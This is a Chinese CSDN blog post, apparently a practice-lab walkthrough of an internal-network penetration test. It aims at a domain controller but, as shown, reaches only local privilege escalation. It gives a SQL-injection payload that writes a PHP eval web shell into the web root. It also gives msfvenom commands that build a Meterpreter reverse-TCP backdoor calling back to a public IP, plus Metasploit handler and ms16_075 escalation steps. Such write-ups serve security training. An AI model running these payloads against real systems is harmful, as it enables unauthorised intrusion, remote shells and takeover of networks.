【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控

本文详细介绍了如何利用Metasploit Framework(MSF)和Impacket工具在内网环境中进行渗透测试,最终获取域控制器的权限。首先,通过SQL注入获取Webshell,然后使用MSF进行提权和内网穿透。接着,利用Kiwi模块抓取密码并进行hash传递尝试。最后,通过Impacket的smbexec.py模块,利用NTLM hash成功登陆域控,实现域控的接管。整个过程展示了从信息收集到权限提升的一系列步骤。
摘要由CSDN通过智能技术生成

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

查看资料

1、进去一看,典型的sql注入
在这里插入图片描述
2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

在这里插入图片描述
②蚁剑连接,发现权限很低
在这里插入图片描述

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么内网穿透,方法太多了)

kali内网穿透用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108
在这里插入图片描述
2、接着设置一下花生壳的配置在这里插入图片描述
3、可以看到我们映射到公网的ip和端口
在这里插入图片描述
4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

在这里插入图片描述
5、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp
或者使用
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 6666
run

在这里插入图片描述
6、执行webshell中的木马
在这里插入图片描述

sessions 1 //进入会话

7、发现无法不是最高权限,getsystem/getprivs并未成功
在这里插入图片描述
8、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令
在这里插入图片描述
②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值